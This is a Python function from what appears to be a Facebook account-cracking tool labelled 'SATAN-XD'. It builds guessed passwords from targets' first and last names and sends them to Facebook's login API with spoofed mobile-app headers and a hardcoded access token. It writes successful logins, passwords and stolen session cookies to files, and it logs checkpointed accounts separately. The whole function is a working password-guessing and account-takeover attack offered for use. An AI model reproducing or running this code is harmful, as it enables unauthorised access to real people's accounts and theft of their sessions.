def api1(ids,names,passlist,total_ids):
    try:
        global oks,loop,cps
        sys.stdout.write(f'\r\r\033[1;37m [\033[1;30mSATAN-XD\033[1;37m] {loop}|{total_ids} \033[1;32m[OK:{len(oks)}] \033[1;30m[CP:{len(cps)}] \033[1;37m');sys.stdout.flush()
        fn = names.split(' ')[0]
        try:
            ln = names.split(' ')[1]
        except:
            ln = fn
        for pw in passlist:
            pas = pw.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',names).replace('name',names.lower()) 
            accees_token = '350685531728|62f8ce9f74b12f84c123cc23437a4a32'           
            random_seed = random.Random()
            adid = str(''.join(random_seed.choices(string.hexdigits, k=16)))
            ua  = "[FBAN/FB4A;FBAV/"+str(random.randint(1,3))+"."+str(random.randrange(1,9))+"."+str(random.randint(0,9)) +";FBBV/"+str(random.randint(111111,777777))+";FBAN/FB4A;FBAV/335.0.0.28.118;FBPN/com.facebook.katana;FBLC/ru_RU;FBBV/316527966;FBCR/Bezlimit;FBMF/Xiaomi;FBBD/Redmi;FBDV/Redmi Note 8 Pro;FBSV/11;FBCA/armeabi-v7a:armeabi;FBDM/{density=2.75,width=1080,height=2220};FB_FW/1;FBRV/317757053;]"            
            head = {'User-Agent': ua,'Accept-Encoding':'gzip, deflate','Connection':'close','Content-Type':'application/x-www-form-urlencoded','Host':'graph.facebook.com','X-FB-Net-HNI':str(random.randint(2e4, 4e4)),'X-FB-SIM-HNI':str(random.randint(2e4, 4e4)),'Authorization':'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32','X-FB-Connection-Type':'WIFI','X-Tigon-Is-Retry':'False','x-fb-session-id':'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=62f8ce9f74b12f84c123cc23437a4a32','x-fb-device-group':'5120','X-FB-Friendly-Name':'ViewerReactionsMutation','X-FB-Request-Analytics-Tags':'graphservice','X-FB-HTTP-Engine':'Liger','X-FB-Client-IP':'True','X-FB-Server-Cluster':'True','x-fb-connection-token':'62f8ce9f74b12f84c123cc23437a4a32'}
            data = {'adid':adid,'format':'json','device_id':str(uuid.uuid4()),'email':ids,'password':pas,'generate_analytics_claims':'1','community_id':'','cpl':'true','try_num':'1','family_device_id':str(uuid.uuid4()),'credentials_type':'password','source':'login','error_detail_type':'button_with_disabled','enroll_misauth':'false','generate_session_cookies':'1','generate_machine_id':'1','currently_logged_in_userid':'0','locale': 'ru_RU','client_country_code': 'RU','fb_api_req_friendly_name':'authenticate','api_key':'62f8ce9f74b12f84c123cc23437a4a32','access_token':accees_token}
            po = requests.post('https://graph.facebook.com/auth/login',data=data,headers=head).json()
            if 'session_key' in po:
                uid = str(po['uid'])
                print('\r\r\033[1;32m [SATAN-OK] '+uid+' | '+pas)
                ckkk = ";".join(i["name"]+"="+i["value"] for i in po["session_cookies"])
                ssbb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-")
                cookies = f"sb={ssbb};{ckkk}"
                open('/sdcard/SATAN-OK.txt','a').write(uid+'|'+pas+'\n')
                open('/sdcard/SATAN-COKIE.txt','a').write(ids+'|'+pw+' | '+cookies+'\n')
                oks.append(uid)
                break
            elif 'www.facebook.com' in po['error']['message']:
                uid = str(po['error']['error_data']['uid'])
                #print(f'\r\r\033[1;30m [SATAN-CP] '+uid+' | '+pas+'\033[1;97m')
                open('/sdcard/SATAN-CP.txt','a').write(uid+'|'+pas+'\n')
                cps.append(uid)
                break
            else:
                continue
        loop+=1
    except requests.exceptions.ConnectionError:
        time.sleep(20)
    except Exception as e:
        pass
